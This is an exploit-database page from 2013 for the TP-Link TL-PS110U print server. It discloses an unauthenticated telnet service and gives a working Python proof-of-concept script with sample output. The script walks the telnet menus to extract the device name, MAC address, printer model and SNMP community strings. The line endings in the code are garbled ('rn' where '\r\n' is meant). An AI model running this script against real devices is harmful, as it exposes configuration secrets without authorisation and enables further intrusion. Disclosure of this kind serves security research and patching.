TP-Link Print Server TL PS110U - Sensitive Information Enumeration

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TP-Link Print Server TL PS110U - Sensitive Information Enumeration
# Published : 2013-06-19
# Author :
# Previous Title : MoinMoin twikidraw Action Traversal File Upload
# Next Title : PCMan FTP Server 2.0.7 - Remote Exploit (msf)

# Exploit Title: TP-Link Print Server Sensitive Information Enumeration
# Exploit Author: SANTHO
# Vendor Homepage: http://www.tp-link.com
# Software Link: http://www.tp-link.com/en/products/details/?model=TL-PS110U
# Version: TL PS110U
TP-Link TL PS110U Print Server runs telnet service which enables an
attacker to access the configuration details without authentication. The
PoC can extract device name, MAC address, manufacture name, Printer model,
and SNMP Community Strings.

*Sample Output*

root@bt# ./tplink-enum.py 10.0.0.2

Device Name : 1P_PrintServABCD

Node ID : AA-AA-AA-AA-AA-AA

Manufacture: Hewlett-Packard

Model: HP LaserJet M1005

Community 1: public Read-Only

Community 2: public Read-Only

import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("rn")
tn.read_until("choice")
tn.write("1rn")
tn.read_until("choice")
tn.write("1rn")
data = tn.read_until("choice")
for i in data.split("rn"):
	if "Device Name" in i:
		print i.strip()
	if "Node ID" in i:
		print i.strip()
tn.write("0rn")
tn.read_until("choice")
tn.write("2rn")
data = tn.read_until("choice")
for i in data.split("rn"):
	if "Manufacture:" in i:
		print i.strip()
	if "Model:" in i:
		print i.strip()
tn.write("0rn")
tn.read_until("choice")
tn.write("5rn")
data = tn.read_until("choice")
for i in data.split("rn"):
	if "Community" in i:
		print i.strip()